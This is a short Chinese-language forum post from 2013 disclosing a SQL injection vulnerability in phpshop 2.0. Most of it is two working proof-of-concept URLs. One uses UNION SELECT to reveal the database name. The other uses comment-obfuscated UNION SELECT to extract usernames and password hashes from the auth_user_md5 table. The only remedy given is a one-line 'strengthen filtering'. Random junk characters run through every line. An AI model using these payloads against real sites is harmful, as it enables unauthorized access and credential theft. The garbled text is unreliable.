标题 : phpshop 2.0 SQL Injection Vulnerability
. v" R) L7 e# j) h
; T+ n3 ?1 \0 [( F" H# C作者 : By onestree9 c7 |. U2 X9 ^9 s
下载地址 : http://code.google.com/p/phpshop/downloads/list( }7 @' l9 d) R
测试地址: windows 7 / ubuntu/ m H& Q9 [* z5 A
6 n- A+ `- ]' n$ k+ I) k
7 ]: e6 ~/ ^- @SQLi p0c:4 `% }; W3 {9 t7 o! F' s
3 Y3 V0 ] ^0 }9 W==================
4 o+ V9 W7 |/ Y9 n3 s ( D7 L& Y `0 i5 i# ^) T
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
! A. O, W* l* Q( @7 R+ ^2 Runion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --$ c% l+ ^ e! A- t M
/ \: x6 N- U7 Z* y
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
' a: @" [4 ?' U/ N6 t, g
4 d( ]0 @! B4 l' V0 L. a/ W修复:5 Z' N2 j K6 l( x% `' x( y
加强过滤
; Y. D5 e' q" d/ A3 L4 I! n3 {& M2 v% W5 X' k
; z- C! j8 H0 t* [. G
|
发表于 2013-1-18 18:24:10
收藏
支持
反对